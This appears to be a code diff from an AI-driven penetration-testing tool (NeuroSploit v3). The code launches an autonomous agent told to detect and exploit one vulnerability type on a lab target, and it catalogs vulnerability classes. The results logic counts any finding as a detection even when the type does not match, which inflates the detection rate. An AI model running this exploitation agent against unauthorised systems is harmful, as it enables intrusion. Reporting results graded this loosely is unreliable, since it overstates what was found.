            agent_results[agent_id]["findings_count"] = len(findings_list)
    try:
        async with async_session_factory() as db:
            # Create a scan record linked to this challenge
            scan = Scan(
                name=f"VulnLab: {vuln_title} - {target[:50]}",
                status="running",
                scan_type="full_auto",
                recon_enabled=True,
                progress=0,
                current_phase="initializing",
                custom_prompt=f"Focus ONLY on testing for {vuln_title} ({vuln_type}). "
                f"Do NOT test other vulnerability types. "
                f"Test thoroughly with multiple payloads and techniques for this specific vulnerability.",
            )
            db.add(scan)
            await db.commit()
            await db.refresh(scan)
            scan_id = scan.id
            # Create target record
            target_record = Target(scan_id=scan_id, url=target, status="pending")
            db.add(target_record)
            await db.commit()
            # Update challenge with scan_id
            result = await db.execute(
                select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
            )
            challenge = result.scalar_one_or_none()
            if challenge:
                challenge.scan_id = scan_id
                await db.commit()
            if challenge_id in lab_results:
                lab_results[challenge_id]["scan_id"] = scan_id
            # Register in agent.py's shared mappings so ScanDetailsPage works
            agent_to_scan[agent_id] = scan_id
            scan_to_agent[scan_id] = agent_id
            if agent_id in agent_results:
                agent_results[agent_id]["scan_id"] = scan_id
            # Build focused prompt for isolated testing
            focused_prompt = (
                f"You are testing specifically for {vuln_title} ({vuln_type}). "
                f"Focus ALL your efforts on detecting and exploiting this single vulnerability type. "
                f"Do NOT scan for other vulnerability types. "
                f"Use all relevant payloads and techniques for {vuln_type}. "
                f"Be thorough: try multiple injection points, encoding bypasses, and edge cases. "
                f"This is a lab/CTF challenge - the vulnerability is expected to exist."
            )
            if challenge_name:
                focused_prompt += (
                    f"\n\nCHALLENGE HINT: This is PortSwigger lab '{challenge_name}'. "
                    f"Use this name to understand what specific technique or bypass is needed. "
                    f"For example, 'angle brackets HTML-encoded' means attribute-based XSS, "
                    f"'most tags and attributes blocked' means fuzz for allowed tags/events."
                )
            if notes:
                focused_prompt += f"\n\nUSER NOTES: {notes}"
            lab_ctx = {
                "challenge_name": challenge_name,
                "notes": notes,
                "vuln_type": vuln_type,
                "is_lab": True,
            }
            async with AutonomousAgent(
                target=target,
                mode=OperationMode.FULL_AUTO,
                log_callback=log_callback,
                progress_callback=progress_callback,
                auth_headers=auth_headers,
                custom_prompt=focused_prompt,
                finding_callback=finding_callback,
                lab_context=lab_ctx,
            ) as agent:
                lab_agents[challenge_id] = agent
                # Also register in agent.py's shared instances so stop works
                agent_instances[agent_id] = agent
                report = await agent.run()
            lab_agents.pop(challenge_id, None)
            agent_instances.pop(agent_id, None)
            # Prefer findings from the final report; fall back to the ones collected
            # through the real-time callback when the report has none
            findings = report.get("findings", []) or findings_list
            severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
            findings_detail = []
            for finding in findings:
                severity = finding.get("severity", "medium").lower()
                if severity in severity_counts:
                    severity_counts[severity] += 1
                findings_detail.append({
                    "title": finding.get("title", ""),
                    "vulnerability_type": finding.get("vulnerability_type", ""),
                    "severity": severity,
                    "affected_endpoint": finding.get("affected_endpoint", ""),
                    "evidence": (finding.get("evidence", "") or "")[:500],
                    "payload": (finding.get("payload", "") or "")[:200],
                })
                # Save to vulnerabilities table
                vuln = Vulnerability(
                    scan_id=scan_id,
                    title=finding.get("title", finding.get("type", "Unknown")),
                    vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
                    severity=severity,
                    cvss_score=finding.get("cvss_score"),
                    cvss_vector=finding.get("cvss_vector"),
                    cwe_id=finding.get("cwe_id"),
                    description=finding.get("description", finding.get("evidence", "")),
                    affected_endpoint=finding.get("affected_endpoint", finding.get("url", target)),
                    poc_payload=finding.get("payload", finding.get("poc_payload", finding.get("poc_code", ""))),
                    poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
                    poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
                    poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
                    poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
                    impact=finding.get("impact", ""),
                    remediation=finding.get("remediation", ""),
                    references=finding.get("references", []),
                    ai_analysis=finding.get("ai_analysis", ""),
                    screenshots=finding.get("screenshots", []),
                    url=finding.get("url", finding.get("affected_endpoint", "")),
                    parameter=finding.get("parameter", finding.get("poc_parameter", "")),
                )
                db.add(vuln)
            # Save discovered endpoints from recon data
            endpoints_count = 0
            for ep in report.get("recon", {}).get("endpoints", []):
                endpoints_count += 1
                if isinstance(ep, str):
                    endpoint = Endpoint(
                        scan_id=scan_id,
                        target_id=target_record.id,
                        url=ep,
                        method="GET",
                        path=ep.split("?")[0].split("/")[-1] or "/"
                    )
                else:
                    endpoint = Endpoint(
                        scan_id=scan_id,
                        target_id=target_record.id,
                        url=ep.get("url", ""),
                        method=ep.get("method", "GET"),
                        path=ep.get("path", "/")
                    )
                db.add(endpoint)
            # Determine result with flexible matching. The agent was told to focus
            # on one type, so any finding counts as a detection, even when its
            # reported type does not match the target type.
            target_type_findings = [
                f for f in findings
                if _vuln_type_matches(vuln_type, f.get("vulnerability_type", ""))
            ]
            if target_type_findings or findings:
                result_status = "detected"
            else:
                result_status = "not_detected"
            # Update scan
            scan.status = "completed"
            scan.completed_at = datetime.utcnow()
            scan.progress = 100
            scan.current_phase = "completed"
            scan.total_vulnerabilities = len(findings)
            scan.total_endpoints = endpoints_count
            scan.critical_count = severity_counts["critical"]
            scan.high_count = severity_counts["high"]
            scan.medium_count = severity_counts["medium"]
            scan.low_count = severity_counts["low"]
            scan.info_count = severity_counts["info"]
            # Auto-generate report
            exec_summary = report.get("executive_summary", f"VulnLab test for {vuln_title} on {target}")
            report_record = Report(
                scan_id=scan_id,
                title=f"VulnLab: {vuln_title} - {target[:50]}",
                format="json",
                executive_summary=exec_summary[:1000] if exec_summary else None,
            )
            db.add(report_record)
            # Persist logs (keep last 500 entries to avoid huge DB rows)
            persisted_logs = logs[-500:]
            # Update challenge record
            result_q = await db.execute(
                select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
            )
            challenge = result_q.scalar_one_or_none()
            if challenge:
                challenge.status = "completed"
                challenge.result = result_status
                challenge.completed_at = datetime.utcnow()
                challenge.duration = int((datetime.utcnow() - challenge.started_at).total_seconds()) if challenge.started_at else 0
                challenge.findings_count = len(findings)
                challenge.critical_count = severity_counts["critical"]
                challenge.high_count = severity_counts["high"]
                challenge.medium_count = severity_counts["medium"]
                challenge.low_count = severity_counts["low"]
                challenge.info_count = severity_counts["info"]
                challenge.findings_detail = findings_detail
                challenge.logs = persisted_logs
                challenge.endpoints_count = endpoints_count
            await db.commit()
        # Update in-memory results
        if challenge_id in lab_results:
            lab_results[challenge_id]["status"] = "completed"
            lab_results[challenge_id]["result"] = result_status
            lab_results[challenge_id]["findings"] = findings
            lab_results[challenge_id]["progress"] = 100
            lab_results[challenge_id]["phase"] = "completed"
        if agent_id in agent_results:
            agent_results[agent_id]["status"] = "completed"
            agent_results[agent_id]["completed_at"] = datetime.utcnow().isoformat()
            agent_results[agent_id]["report"] = report
            agent_results[agent_id]["findings"] = findings
            agent_results[agent_id]["progress"] = 100
            agent_results[agent_id]["phase"] = "completed"
    except Exception as e:
        import traceback
        error_tb = traceback.format_exc()
        print(f"VulnLab error: {error_tb}")
        if challenge_id in lab_results:
            lab_results[challenge_id]["status"] = "error"
            lab_results[challenge_id]["error"] = str(e)
        if agent_id in agent_results:
            agent_results[agent_id]["status"] = "error"
            agent_results[agent_id]["error"] = str(e)
        # Persist logs even on error
        persisted_logs = logs[-500:]
        # Update DB records
        try:
            async with async_session_factory() as db:
                result = await db.execute(
                    select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
                )
                challenge = result.scalar_one_or_none()
                if challenge:
                    challenge.status = "failed"
                    challenge.result = "error"
                    challenge.completed_at = datetime.utcnow()
                    challenge.notes = (challenge.notes or "") + f"\nError: {str(e)}"
                    challenge.logs = persisted_logs
                    await db.commit()
                if scan_id:
                    result = await db.execute(select(Scan).where(Scan.id == scan_id))
                    scan = result.scalar_one_or_none()
                    if scan:
                        scan.status = "failed"
                        scan.error_message = str(e)
                        scan.completed_at = datetime.utcnow()
                        await db.commit()
        except Exception:
            # Best-effort status update; the original error is already recorded in memory
            pass
    finally:
        lab_agents.pop(challenge_id, None)
        agent_instances.pop(agent_id, None)
def _vuln_type_matches(target_type: str, found_type: str) -> bool:
    """Check if a found vuln type matches the target type (flexible matching)"""
    if not found_type:
        return False
    target = target_type.lower().replace("_", " ").replace("-", " ")
    found = found_type.lower().replace("_", " ").replace("-", " ")
    # Exact match
    if target == found:
        return True
    # Target is substring of found or vice versa
    if target in found or found in target:
        return True
    # Key word matching for common patterns
    target_words = set(target.split())
    found_words = set(found.split())
    # If they share major keywords (xss, sqli, ssrf, etc.)
    major_keywords = {"xss", "sqli", "sql", "injection", "ssrf", "csrf", "lfi", "rfi",
                      "xxe", "ssti", "idor", "cors", "jwt", "redirect", "traversal"}
    shared = target_words & found_words & major_keywords
    return bool(shared)
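# Illustrative sketch, not part of the original module: a condensed standalone copy
# of the matching rules above, to show which pairs they accept. Because "injection"
# is one of the major keywords, unrelated injection types (for example
# command_injection and ldap_injection) also match each other. match_sketch and
# MAJOR_KEYWORDS are hypothetical names used only for this example.
MAJOR_KEYWORDS = {"xss", "sqli", "sql", "injection", "ssrf", "csrf", "lfi", "rfi",
                  "xxe", "ssti", "idor", "cors", "jwt", "redirect", "traversal"}
def _normalize(name: str) -> str:
    """Lower-case and treat underscores and hyphens as spaces."""
    return name.lower().replace("_", " ").replace("-", " ")
def match_sketch(target_type: str, found_type: str) -> bool:
    if not found_type:
        return False
    target, found = _normalize(target_type), _normalize(found_type)
    # Substring containment in either direction also covers the exact match
    if target in found or found in target:
        return True
    # Otherwise require at least one shared major keyword
    return bool(set(target.split()) & set(found.split()) & MAJOR_KEYWORDS)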
@router.get("/challenges")
async def list_challenges(
    vuln_type: Optional[str] = None,
    vuln_category: Optional[str] = None,
    status: Optional[str] = None,
    result: Optional[str] = None,
    limit: int = 50,
):
    """List all vulnerability lab challenges with optional filtering"""
    async with async_session_factory() as db:
        query = select(VulnLabChallenge).order_by(VulnLabChallenge.created_at.desc())
        if vuln_type:
            query = query.where(VulnLabChallenge.vuln_type == vuln_type)
        if vuln_category:
            query = query.where(VulnLabChallenge.vuln_category == vuln_category)
        if status:
            query = query.where(VulnLabChallenge.status == status)
        if result:
            query = query.where(VulnLabChallenge.result == result)
        query = query.limit(limit)
        db_result = await db.execute(query)
        challenges = db_result.scalars().all()
        # For list view, exclude large logs field to save bandwidth
        result_list = []
        for c in challenges:
            d = c.to_dict()
            # "logs" may be present but None for challenges that never logged
            d["logs_count"] = len(d.get("logs") or [])
            d.pop("logs", None)  # Don't send full logs in list view
            result_list.append(d)
        return {
            "challenges": result_list,
            "total": len(challenges),
        }
@router.get("/challenges/{challenge_id}")
async def get_challenge(challenge_id: str):
    """Get challenge details including real-time status if running"""
    # Check in-memory first for real-time data
    if challenge_id in lab_results:
        mem = lab_results[challenge_id]
        return {
            "challenge_id": challenge_id,
            "status": mem["status"],
            "progress": mem.get("progress", 0),
            "phase": mem.get("phase", ""),
            "findings_count": len(mem.get("findings", [])),
            "findings": mem.get("findings", []),
            "logs_count": len(mem.get("logs", [])),
            "logs": mem.get("logs", [])[-200:],  # Last 200 log entries for real-time
            "error": mem.get("error"),
            "result": mem.get("result"),
            "scan_id": mem.get("scan_id"),
            "agent_id": mem.get("agent_id"),
            "vuln_type": mem.get("vuln_type"),
            "target": mem.get("target"),
            "source": "realtime",
        }
    # Fall back to DB
    async with async_session_factory() as db:
        result = await db.execute(
            select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
        )
        challenge = result.scalar_one_or_none()
        if not challenge:
            raise HTTPException(status_code=404, detail="Challenge not found")
        data = challenge.to_dict()
        data["source"] = "database"
        # "logs" may be present but None for challenges that never logged
        data["logs_count"] = len(data.get("logs") or [])
        return data
@router.get("/stats")
async def get_lab_stats():
    """Get aggregated stats for all lab challenges"""
    async with async_session_factory() as db:
        # Total counts by status
        total_result = await db.execute(
            select(
                VulnLabChallenge.status,
                func.count(VulnLabChallenge.id)
            ).group_by(VulnLabChallenge.status)
        )
        status_counts = {row[0]: row[1] for row in total_result.fetchall()}
        # Results breakdown
        results_q = await db.execute(
            select(
                VulnLabChallenge.result,
                func.count(VulnLabChallenge.id)
            ).where(VulnLabChallenge.result.isnot(None))
            .group_by(VulnLabChallenge.result)
        )
        result_counts = {row[0]: row[1] for row in results_q.fetchall()}
        # Per vuln_type stats
        type_stats_q = await db.execute(
            select(
                VulnLabChallenge.vuln_type,
                VulnLabChallenge.result,
                func.count(VulnLabChallenge.id)
            ).where(VulnLabChallenge.status == "completed")
            .group_by(VulnLabChallenge.vuln_type, VulnLabChallenge.result)
        )
        type_stats = {}
        for row in type_stats_q.fetchall():
            vtype, res, count = row
            if vtype not in type_stats:
                type_stats[vtype] = {"detected": 0, "not_detected": 0, "error": 0, "total": 0}
            type_stats[vtype][res or "error"] = count
            type_stats[vtype]["total"] += count
        # Per category stats
        cat_stats_q = await db.execute(
            select(
                VulnLabChallenge.vuln_category,
                VulnLabChallenge.result,
                func.count(VulnLabChallenge.id)
            ).where(VulnLabChallenge.status == "completed")
            .group_by(VulnLabChallenge.vuln_category, VulnLabChallenge.result)
        )
        cat_stats = {}
        for row in cat_stats_q.fetchall():
            cat, res, count = row
            if cat not in cat_stats:
                cat_stats[cat] = {"detected": 0, "not_detected": 0, "error": 0, "total": 0}
            cat_stats[cat][res or "error"] = count
            cat_stats[cat]["total"] += count
        # Currently running
        running = len([cid for cid, r in lab_results.items() if r.get("status") == "running"])
        total = sum(status_counts.values())
        detected = result_counts.get("detected", 0)
        completed = status_counts.get("completed", 0)
        detection_rate = round((detected / completed * 100), 1) if completed > 0 else 0
        return {
            "total": total,
            "running": running,
            "status_counts": status_counts,
            "result_counts": result_counts,
            "detection_rate": detection_rate,
            "by_type": type_stats,
            "by_category": cat_stats,
        }
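# Illustrative sketch, not part of the original module: the per-type and
# per-category loops above both fold grouped (key, result, count) rows into the
# same bucket shape. The standalone helpers below show that fold and the
# detection-rate formula on plain tuples, with no database involved.
# aggregate_results and detection_rate are hypothetical names.
from typing import Dict, Iterable, Optional, Tuple
def aggregate_results(rows: Iterable[Tuple[str, Optional[str], int]]) -> Dict[str, Dict[str, int]]:
    stats: Dict[str, Dict[str, int]] = {}
    for key, res, count in rows:
        bucket = stats.setdefault(key, {"detected": 0, "not_detected": 0, "error": 0, "total": 0})
        # A missing result is counted under "error", as in the endpoint
        bucket[res or "error"] = count
        bucket["total"] += count
    return stats
def detection_rate(detected: int, completed: int) -> float:
    """Percentage of completed challenges with a detection, one decimal place."""
    return round(detected / completed * 100, 1) if completed > 0 else 0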
@router.post("/challenges/{challenge_id}/stop")
async def stop_challenge(challenge_id: str):
    """Stop a running lab challenge"""
    agent = lab_agents.get(challenge_id)
    if not agent:
        raise HTTPException(status_code=404, detail="No running agent for this challenge")
    agent.cancel()
    # Update DB
    try:
        async with async_session_factory() as db:
            result = await db.execute(
                select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
            )
            challenge = result.scalar_one_or_none()
            if challenge:
                challenge.status = "stopped"
                challenge.completed_at = datetime.utcnow()
                await db.commit()
    except Exception:
        # Best-effort DB update; the agent has already been cancelled
        pass
    if challenge_id in lab_results:
        lab_results[challenge_id]["status"] = "stopped"
    return {"message": "Challenge stopped"}
@router.delete("/challenges/{challenge_id}")
async def delete_challenge(challenge_id: str):
    """Delete a lab challenge record"""
    # Stop if running
    agent = lab_agents.get(challenge_id)
    if agent:
        agent.cancel()
        lab_agents.pop(challenge_id, None)
    lab_results.pop(challenge_id, None)
    async with async_session_factory() as db:
        result = await db.execute(
            select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
        )
        challenge = result.scalar_one_or_none()
        if not challenge:
            raise HTTPException(status_code=404, detail="Challenge not found")
        await db.delete(challenge)
        await db.commit()
    return {"message": "Challenge deleted"}
@router.get("/logs/{challenge_id}")
async def get_challenge_logs(challenge_id: str, limit: int = 200):
    """Get logs for a challenge (real-time or from DB)"""
    # Check in-memory first for real-time data
    mem = lab_results.get(challenge_id)
    if mem:
        all_logs = mem.get("logs", [])
        return {
            "challenge_id": challenge_id,
            "total_logs": len(all_logs),
            # all_logs[-0:] would return every entry, so guard non-positive limits
            "logs": all_logs[-limit:] if limit > 0 else [],
            "source": "realtime",
        }
    # Fall back to DB persisted logs
    async with async_session_factory() as db:
        result = await db.execute(
            select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
        )
        challenge = result.scalar_one_or_none()
        if not challenge:
            raise HTTPException(status_code=404, detail="Challenge not found")
        all_logs = challenge.logs or []
        return {
            "challenge_id": challenge_id,
            "total_logs": len(all_logs),
            "logs": all_logs[-limit:] if limit > 0 else [],
            "source": "database",
        }
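# Illustrative sketch, not part of the original module: returning the last `limit`
# log entries with a negative-index slice. In Python, items[-0:] is the same as
# items[0:], so a limit of 0 would return the whole list unless it is guarded.
# tail is a hypothetical helper name.
from typing import List, TypeVar
T = TypeVar("T")
def tail(items: List[T], limit: int) -> List[T]:
    """Return the last `limit` items, or an empty list for a non-positive limit."""
    return items[-limit:] if limit > 0 else []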
@@ -1,389 +0,0 @@
"""
NeuroSploit v3 - Vulnerabilities API Endpoints
"""
from typing import List
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select
from backend.db.database import get_db
from backend.models import Vulnerability
from backend.schemas.vulnerability import VulnerabilityResponse, VulnerabilityTypeInfo
router = APIRouter()
# Vulnerability type definitions
VULNERABILITY_TYPES = {
"injection": {
"xss_reflected": {
"name": "Reflected XSS",
"description": "Cross-site scripting via user input reflected in response",
"severity_range": "medium-high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-79"]
},
"xss_stored": {
"name": "Stored XSS",
"description": "Cross-site scripting stored in application database",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-79"]
},
"xss_dom": {
"name": "DOM-based XSS",
"description": "Cross-site scripting via DOM manipulation",
"severity_range": "medium-high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-79"]
},
"sqli_error": {
"name": "Error-based SQL Injection",
"description": "SQL injection detected via error messages",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-89"]
},
"sqli_union": {
"name": "Union-based SQL Injection",
"description": "SQL injection exploitable via UNION queries",
"severity_range": "critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-89"]
},
"sqli_blind": {
"name": "Blind SQL Injection",
"description": "SQL injection without visible output",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-89"]
},
"sqli_time": {
"name": "Time-based SQL Injection",
"description": "SQL injection detected via response time",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-89"]
},
"command_injection": {
"name": "Command Injection",
"description": "OS command injection vulnerability",
"severity_range": "critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-78"]
},
"ssti": {
"name": "Server-Side Template Injection",
"description": "Template injection allowing code execution",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-94"]
},
"ldap_injection": {
"name": "LDAP Injection",
"description": "LDAP query injection",
"severity_range": "high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-90"]
},
"xpath_injection": {
"name": "XPath Injection",
"description": "XPath query injection",
"severity_range": "medium-high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-643"]
},
"nosql_injection": {
"name": "NoSQL Injection",
"description": "NoSQL database injection",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-943"]
},
"header_injection": {
"name": "HTTP Header Injection",
"description": "Injection into HTTP headers",
"severity_range": "medium-high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-113"]
},
"crlf_injection": {
"name": "CRLF Injection",
"description": "Carriage return line feed injection",
"severity_range": "medium",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-93"]
}
},
"file_access": {
"lfi": {
"name": "Local File Inclusion",
"description": "Include local files via path manipulation",
"severity_range": "high-critical",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-98"]
},
"rfi": {
"name": "Remote File Inclusion",
"description": "Include remote files for code execution",
"severity_range": "critical",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-98"]
},
"path_traversal": {
"name": "Path Traversal",
"description": "Access files outside web root",
"severity_range": "high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-22"]
},
"file_upload": {
"name": "Arbitrary File Upload",
"description": "Upload malicious files",
"severity_range": "high-critical",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-434"]
},
"xxe": {
"name": "XML External Entity",
"description": "XXE injection vulnerability",
"severity_range": "high-critical",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-611"]
}
},
"request_forgery": {
"ssrf": {
"name": "Server-Side Request Forgery",
"description": "Forge requests from the server",
"severity_range": "high-critical",
"owasp_category": "A10:2021",
"cwe_ids": ["CWE-918"]
},
"ssrf_cloud": {
"name": "SSRF to Cloud Metadata",
"description": "SSRF accessing cloud provider metadata",
"severity_range": "critical",
"owasp_category": "A10:2021",
"cwe_ids": ["CWE-918"]
},
"csrf": {
"name": "Cross-Site Request Forgery",
"description": "Forge requests as authenticated user",
"severity_range": "medium-high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-352"]
}
},
"authentication": {
"auth_bypass": {
"name": "Authentication Bypass",
"description": "Bypass authentication mechanisms",
"severity_range": "critical",
"owasp_category": "A07:2021",
"cwe_ids": ["CWE-287"]
},
"session_fixation": {
"name": "Session Fixation",
"description": "Force known session ID on user",
"severity_range": "high",
"owasp_category": "A07:2021",
"cwe_ids": ["CWE-384"]
},
"jwt_manipulation": {
"name": "JWT Token Manipulation",
"description": "Manipulate JWT tokens for auth bypass",
"severity_range": "high-critical",
"owasp_category": "A07:2021",
"cwe_ids": ["CWE-347"]
},
"weak_password_policy": {
"name": "Weak Password Policy",
"description": "Application accepts weak passwords",
"severity_range": "medium",
"owasp_category": "A07:2021",
"cwe_ids": ["CWE-521"]
}
},
"authorization": {
"idor": {
"name": "Insecure Direct Object Reference",
"description": "Access objects without proper authorization",
"severity_range": "high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-639"]
},
"bola": {
"name": "Broken Object Level Authorization",
"description": "API-level object authorization bypass",
"severity_range": "high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-639"]
},
"privilege_escalation": {
"name": "Privilege Escalation",
"description": "Escalate to higher privilege level",
"severity_range": "critical",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-269"]
}
},
"api_security": {
"rate_limiting": {
"name": "Missing Rate Limiting",
"description": "No rate limiting on sensitive endpoints",
"severity_range": "medium",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-770"]
},
"mass_assignment": {
"name": "Mass Assignment",
"description": "Modify unintended object properties",
"severity_range": "high",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-915"]
},
"excessive_data": {
"name": "Excessive Data Exposure",
"description": "API returns more data than needed",
"severity_range": "medium-high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-200"]
},
"graphql_introspection": {
"name": "GraphQL Introspection Enabled",
"description": "GraphQL schema exposed via introspection",
"severity_range": "low-medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-200"]
}
},
"client_side": {
"cors_misconfig": {
"name": "CORS Misconfiguration",
"description": "Permissive CORS policy",
"severity_range": "medium-high",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-942"]
},
"clickjacking": {
"name": "Clickjacking",
"description": "Page can be framed for clickjacking",
"severity_range": "medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-1021"]
},
"open_redirect": {
"name": "Open Redirect",
"description": "Redirect to arbitrary URLs",
"severity_range": "low-medium",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-601"]
}
},
"information_disclosure": {
"error_disclosure": {
"name": "Error Message Disclosure",
"description": "Detailed error messages exposed",
"severity_range": "low-medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-209"]
},
"sensitive_data": {
"name": "Sensitive Data Exposure",
"description": "Sensitive information exposed",
"severity_range": "medium-high",
"owasp_category": "A02:2021",
"cwe_ids": ["CWE-200"]
},
"debug_endpoints": {
"name": "Debug Endpoints Exposed",
"description": "Debug/admin endpoints accessible",
"severity_range": "high",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-489"]
}
},
"infrastructure": {
"security_headers": {
"name": "Missing Security Headers",
"description": "Important security headers not set",
"severity_range": "low-medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-693"]
},
"ssl_issues": {
"name": "SSL/TLS Issues",
"description": "Weak SSL/TLS configuration",
"severity_range": "medium",
"owasp_category": "A02:2021",
"cwe_ids": ["CWE-326"]
},
"http_methods": {
"name": "Dangerous HTTP Methods",
"description": "Dangerous HTTP methods enabled",
"severity_range": "low-medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-749"]
}
},
"logic_flaws": {
"race_condition": {
"name": "Race Condition",
"description": "Exploitable race condition",
"severity_range": "medium-high",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-362"]
},
"business_logic": {
"name": "Business Logic Flaw",
"description": "Exploitable business logic error",
"severity_range": "varies",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-840"]
}
}
}
@router.get("/types")
async def get_vulnerability_types():
"""Get all vulnerability types organized by category"""
return VULNERABILITY_TYPES
@router.get("/types/{category}")
async def get_vulnerability_types_by_category(category: str):
"""Get vulnerability types for a specific category"""
if category not in VULNERABILITY_TYPES:
raise HTTPException(status_code=404, detail=f"Category '{category}' not found")
return VULNERABILITY_TYPES[category]
@router.get("/types/{category}/{vuln_type}", response_model=VulnerabilityTypeInfo)
async def get_vulnerability_type_info(category: str, vuln_type: str):
"""Get detailed info for a specific vulnerability type"""
if category not in VULNERABILITY_TYPES:
raise HTTPException(status_code=404, detail=f"Category '{category}' not found")
if vuln_type not in VULNERABILITY_TYPES[category]:
raise HTTPException(status_code=404, detail=f"Type '{vuln_type}' not found in category '{category}'")
info = VULNERABILITY_TYPES[category][vuln_type]
return VulnerabilityTypeInfo(
type=vuln_type,
category=category,
**info
)
@router.get("/{vuln_id}", response_model=VulnerabilityResponse)
async def get_vulnerability(vuln_id: str, db: AsyncSession = Depends(get_db)):
"""Get a specific vulnerability by ID"""
result = await db.execute(select(Vulnerability).where(Vulnerability.id == vuln_id))
vuln = result.scalar_one_or_none()
if not vuln:
raise HTTPException(status_code=404, detail="Vulnerability not found")
return VulnerabilityResponse(**vuln.to_dict())
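The `/types` routes above resolve a category first and then a type inside it, failing at the first level that is missing. A framework-free sketch of that two-level lookup follows. The trimmed `CATALOG`, the `NotFound` exception, and the `lookup_type` helper are hypothetical names used only for illustration; the original module raises `HTTPException(status_code=404)` instead.

```python
from typing import Any, Dict

# Trimmed stand-in for VULNERABILITY_TYPES; the real catalog has many more entries.
CATALOG: Dict[str, Dict[str, Dict[str, Any]]] = {
    "client_side": {
        "open_redirect": {
            "name": "Open Redirect",
            "description": "Redirect to arbitrary URLs",
            "severity_range": "low-medium",
            "owasp_category": "A01:2021",
            "cwe_ids": ["CWE-601"],
        },
    },
}


class NotFound(LookupError):
    """Hypothetical stand-in for HTTPException(status_code=404)."""


def lookup_type(category: str, vuln_type: str) -> Dict[str, Any]:
    # Check the outer level first so the error names the level that is missing.
    if category not in CATALOG:
        raise NotFound(f"Category '{category}' not found")
    types = CATALOG[category]
    if vuln_type not in types:
        raise NotFound(f"Type '{vuln_type}' not found in category '{category}'")
    # Merge the path parameters into the stored record, as the route does.
    return {"type": vuln_type, "category": category, **types[vuln_type]}
```

In FastAPI, routes are matched in declaration order, so the literal `/types` paths need to stay registered ahead of `/{vuln_id}`, as they are in the file above.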
-247
@@ -1,247 +0,0 @@
"""
NeuroSploit v3 - WebSocket Manager
"""
from typing import Dict, List, Optional
from fastapi import WebSocket
import json
import asyncio
try:
from backend.core.notification_manager import notification_manager, NotificationEvent
HAS_NOTIFICATIONS = True
except ImportError:
HAS_NOTIFICATIONS = False
class ConnectionManager:
"""Manages WebSocket connections for real-time updates"""
def __init__(self):
# scan_id -> list of websocket connections
self.active_connections: Dict[str, List[WebSocket]] = {}
self._lock = asyncio.Lock()
async def connect(self, websocket: WebSocket, scan_id: str):
"""Accept a WebSocket connection and register it for a scan"""
await websocket.accept()
async with self._lock:
if scan_id not in self.active_connections:
self.active_connections[scan_id] = []
self.active_connections[scan_id].append(websocket)
print(f"WebSocket connected for scan: {scan_id}")
def disconnect(self, websocket: WebSocket, scan_id: str):
"""Remove a WebSocket connection"""
if scan_id in self.active_connections:
if websocket in self.active_connections[scan_id]:
self.active_connections[scan_id].remove(websocket)
if not self.active_connections[scan_id]:
del self.active_connections[scan_id]
print(f"WebSocket disconnected for scan: {scan_id}")
async def send_to_scan(self, scan_id: str, message: dict):
"""Send a message to all connections watching a specific scan"""
if scan_id not in self.active_connections:
return
dead_connections = []
for connection in self.active_connections[scan_id]:
try:
await connection.send_text(json.dumps(message))
except Exception:
dead_connections.append(connection)
# Clean up dead connections
for conn in dead_connections:
self.disconnect(conn, scan_id)
async def broadcast_scan_started(self, scan_id: str, target: str = ""):
"""Notify that a scan has started"""
await self.send_to_scan(scan_id, {
"type": "scan_started",
"scan_id": scan_id
})
if HAS_NOTIFICATIONS:
asyncio.create_task(notification_manager.notify(
NotificationEvent.SCAN_STARTED, {"target": target, "scan_id": scan_id}
))
async def broadcast_phase_change(self, scan_id: str, phase: str):
"""Notify phase change (recon, testing, reporting)"""
